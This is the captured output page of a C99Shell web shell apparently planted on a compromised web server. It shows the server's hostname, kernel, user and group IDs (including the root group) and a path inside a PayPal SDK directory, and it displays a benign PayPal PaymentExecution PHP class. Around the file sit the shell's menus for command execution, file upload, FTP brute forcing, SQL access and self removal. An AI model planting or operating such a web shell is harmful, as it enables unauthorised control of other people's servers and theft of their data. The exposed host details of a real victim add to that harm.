!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PaymentExecution.php (2.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class PaymentExecution
 *
 * Let's you execute a PayPal Account based Payment resource with the payer_id obtained from web approval url.
 *
 * @package PayPal\Api
 *
 * @property string                    payer_id
 * @property string                    carrier_account_id
 * @property \PayPal\Api\Transaction[] transactions
 */
class PaymentExecution extends PayPalModel
{
    
/**
     * The ID of the Payer, passed in the `return_url` by PayPal.
     *
     * @param string $payer_id
     *
     * @return $this
     */
    
public function setPayerId($payer_id)
    {
        
$this->payer_id $payer_id;
        return 
$this;
    }

    
/**
     * The ID of the Payer, passed in the `return_url` by PayPal.
     *
     * @return string
     */
    
public function getPayerId()
    {
        return 
$this->payer_id;
    }

    
/**
     * Carrier account id for a carrier billing payment. For a carrier billing payment, payer_id is not applicable.
     *
     * @param string $carrier_account_id
     *
     * @return $this
     */
    
public function setCarrierAccountId($carrier_account_id)
    {
        
$this->carrier_account_id $carrier_account_id;
        return 
$this;
    }

    
/**
     * Carrier account id for a carrier billing payment. For a carrier billing payment, payer_id is not applicable.
     *
     * @return string
     */
    
public function getCarrierAccountId()
    {
        return 
$this->carrier_account_id;
    }

    
/**
     * Transactional details including the amount and item details.
     *
     * @param \PayPal\Api\Transaction[] $transactions
     *
     * @return $this
     */
    
public function setTransactions($transactions)
    {
        
$this->transactions $transactions;
        return 
$this;
    }

    
/**
     * Transactional details including the amount and item details.
     *
     * @return \PayPal\Api\Transaction[]
     */
    
public function getTransactions()
    {
        return 
$this->transactions;
    }

    
/**
     * Append Transactions to the list.
     *
     * @param \PayPal\Api\Transaction $transaction
     * @return $this
     */
    
public function addTransaction($transaction)
    {
        if (!
$this->getTransactions()) {
            return 
$this->setTransactions(array($transaction));
        } else {
            return 
$this->setTransactions(
                
array_merge($this->getTransactions(), array($transaction))
            );
        }
    }

    
/**
     * Remove Transactions from the list.
     *
     * @param \PayPal\Api\Transaction $transaction
     * @return $this
     */
    
public function removeTransaction($transaction)
    {
        return 
$this->setTransactions(
            
array_diff($this->getTransactions(), array($transaction))
        );
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--